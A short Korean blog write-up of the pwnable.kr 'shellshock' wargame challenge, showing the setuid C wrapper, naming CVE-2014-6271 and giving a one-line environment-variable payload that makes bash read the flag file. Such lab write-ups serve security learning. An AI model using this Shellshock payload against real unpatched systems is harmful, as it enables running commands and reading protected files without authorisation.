728x90
반응형
1. intro
2. code 및 분석
2.1. code
#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}
2.2. 분석
흠... 초반이라 그런가... 문제가 영 재미가 없네 ;;;
파일 권한으로 set하고 shock_me 라는 메시지를 출력한다.
3. 취약점 확인 및 공격 준비
3.1. 취약점
CVE-2014-6271
3.2. 공격 준비
뭐...없다
그냥 CVE 취약점이라....
요약하자면 실행하려하는 bash 명령어를 환경변수에 등록하여 이를 함께 실행되도록 하는 방법이다.
4. exploit
shellshock@pwnable:~$ env x='() { :; }; /bin/cat flag' ./shellshock
----------#플래그는 삭제
Segmentation fault (core dumped)
728x90
반응형
'Wargame > pwnable.kr' 카테고리의 다른 글
flag (0) | 2023.01.25 |
---|---|
coin1 (0) | 2022.12.30 |
mistake (0) | 2022.12.29 |
input (0) | 2022.12.28 |
random (0) | 2022.12.28 |